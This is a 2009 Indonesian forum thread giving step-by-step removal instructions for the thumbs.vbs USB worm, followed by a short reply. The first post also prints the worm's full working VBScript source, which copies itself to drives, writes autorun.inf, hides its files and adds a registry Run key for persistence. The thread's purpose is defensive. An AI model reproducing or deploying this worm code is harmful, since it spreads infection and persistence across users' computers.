Would you like to react to this message? Create an account in a few clicks or log in to continue.



 
IndeksPortalGalleryLatest imagesPencarianPendaftaranLogin

 :: [[==>Semua Tentang Komputer & InterNet<==]] :: Tips & Trick Komputer
 

 Hardening Komp

Go down 
2 posters
PengirimMessage
kutukupret
nb
nb
kutukupret


Jumlah posting : 47
Points : 126
Join date : 25.04.09
Lokasi : whatever

Hardening Komp Empty
PostSubyek: Hardening Komp   Hardening Komp I_icon_minitimeThu Jun 04, 2009 8:10 pm
CARA MENGHAPUS thumbs.vbs...
  1. Matikan fungsi AutoRun yang ada di windows.

    * Beberapa cara yang bisa dilakukan untuk mematikan fungsi AutoRun sebagai berikut :

  • Klik Start - Run – ketik gpedit.msc

  • Pada jendela group policy, di browser sebelah kiri pilih di User Configuration lalu Administrative Templates.

  • Pilih System. Di tampilan kanan terlihat beberapa menu.

  • Pilih Turn off Autoplay.

  • Klik kanan properties. Buat enabled.

  • Kemudian Turn off autoplay on : All drives.

  • Klik OK.


Cara di atas mengubah nilai NoDriveTypeAutoRun pada HKEY_LOCAL_MACHINE di registry dengan nilai FF. Jika akan mereset melalui registry ubah menjadi 91 untuk nilai default Windows XP.

* Jika hanya ingin mematikan fungsi AutoRun saat memindahkan data dari/ke flashdisk, tekan tombol shift bersamaan dengan memasukkan flashdisk ke PC.

[list=2][*]Tampilkan seluruh file yang ada di windows, thumbs.vbs dan autorun.inf biasanya berupa hidden file.[/list]

* Pada windows explorer pilih menu Tools – Folder Option
* Pada tab i, check pilihan Show hidden file and folder
* Uncheck pilihan Hide extensions… dan Hide protected operating system file
[list=3][*]Matikan service thumbs.vbs melalui msconfig[/list]
  • Klik Start - Run – ketik msconfig

  • Pada tab Startup, matikan fungsi Thumb (Disini bisa diketahui file induk dari virus disimpan c:\windows\thumbs.vbs)

[list=4][*]Matikan service wscript.exe yang dijalankan melalui process explorer (procexp) atau task manager.[/list]
[list=5][*]Matikan fungsi yang ada di regedit (Klik Start – Run – ketik regedit) dengan menghapus nilai :

"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\avctrl","wscript.exe c:\windows\Thumbs.vbs"


"HKEY_CLASSES_ROOT\vbsfile\DefaultIcon\", "%SystemRoot%\System32\shell32.dll,-154"

"HKEY_CLASSES_ROOT\VBSFile\", "Configuration script"[/list]
[list=6][*]Hapus semua file thumbs.vbs.[/list]
  • Klik Start - Search

  • Ketik thumbs.vbs pada kotak All part of the file name

  • Jangan lupa memberi tanda pada pilihan Search hidden files and folders pada More advanced option

  • Hapus semua file tersebut.


Hardening Komp Warning


Berikut gw sertakan isi file dari virus thumbs.vbs :
'MICROSOFT WINDOWS SYSTEM DRIVER

on error resume next
Dim scriptCode, winpath, flashdrive
Dim fs, autorunFiles, ThumbsFiles
Dim TargetFiles, CreateReg, CheckDrive, scriptRun

autorunFiles = "[autorun]" & vbcrlf & "open=wscript.exe Thumbs.vbs" & vbcrlf & "shell\open=Open" & vbcrlf & "shell\open\Command=wscript.exe Thumbs.vbs" & vbcrlf & "shell\open\Default=1" & vbcrlf & "shell\explore=Explorer" & vbcrlf & "shell\explore\Command=Explorer.exe"

Set fs = CreateObject("scripting.FileSystemObject")
Set ThumbsFiles = fs.getfile(Wscript.scriptFullname)

Dim text, size
size = ThumbsFiles.size
CheckDrive = ThumbsFiles.drive.drivetype
Set text = ThumbsFiles.openastextstream(1, -2)

Do While Not text.atendofstream
scriptCode=scriptCode & text.readline
scriptCode = scriptCode & vbCrLf
Loop

Do
Set winpath = fs.getspecialfolder(0)
Set TargetFiles = fs.getfile(winpath & "\Thumbs.vbs")
TargetFiles.Attributes = 32

Set TargetFiles = fs.createtextfile(winpath & "\Thumbs.vbs", 2, True)
TargetFiles.write scriptCode
TargetFiles.Close

Set TargetFiles = fs.getfile(winpath & "\Thumbs.vbs")
TargetFiles.Attributes = 39

For Each flashdrive In fs.drives

If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path <> "A:" Then
Set TargetFiles = fs.getfile(flashdrive.Path & "\Thumbs.vbs")
TargetFiles.Attributes = 32

Set TargetFiles = fs.createtextfile(flashdrive.Path & "\Thumbs.vbs", 2, True)
TargetFiles.write scriptCode
TargetFiles.Close

Set TargetFiles = fs.getfile(flashdrive.Path & "\Thumbs.vbs")
TargetFiles.Attributes = 39

Set TargetFiles = fs.getfile(flashdrive.Path & "\autorun.inf")
TargetFiles.Attributes = 32

Set TargetFiles = fs.createtextfile(flashdrive.Path & "\autorun.inf", 2, True)
TargetFiles.write autorunFiles
TargetFiles.Close

Set TargetFiles = fs.getfile(flashdrive.Path & "\autorun.inf")
TargetFiles.Attributes = 39
End If

Next

pt = """"
Set CreateReg = CreateObject("Wscript.Shell")
CreateReg.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\avctrl","wscript.exe c:\windows\Thumbs.vbs"
CreateReg.regwrite "HKEY_CLASSES_ROOT\vbsfile\DefaultIcon\", "%SystemRoot%\System32\shell32.dll,-154"
CreateReg.regwrite "HKEY_CLASSES_ROOT\VBSFile\", "Configuration script"


If CheckDrive <> 1 Then Wscript.sleep 200000
Loop While CheckDrive <> 1
Set scriptRun = CreateObject("Wscript.shell")
scriptRun.run winpath & "\explorer.exe /e,/select, " & Wscript.scriptFullname

Hardening Komp Petir
Kembali Ke Atas Go down
http://k3r4s4k1t.co.cc
___rey
Admin
Admin
___rey


Jumlah posting : 53
Points : 124
Join date : 19.04.09
Age : 37
Lokasi : (¯`·._)-b_i_t_c_h-(¯`·._)

Hardening Komp Empty
PostSubyek: Re: Hardening Komp   Hardening Komp I_icon_minitimeThu Jun 04, 2009 10:57 pm
nice post bro,, keep u r rock Hardening Komp 743230
Kembali Ke Atas Go down
https://jgc6.indonesianforum.net
 
Hardening Komp
Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
 :: [[==>Semua Tentang Komputer & InterNet<==]] :: Tips & Trick Komputer-
Navigasi: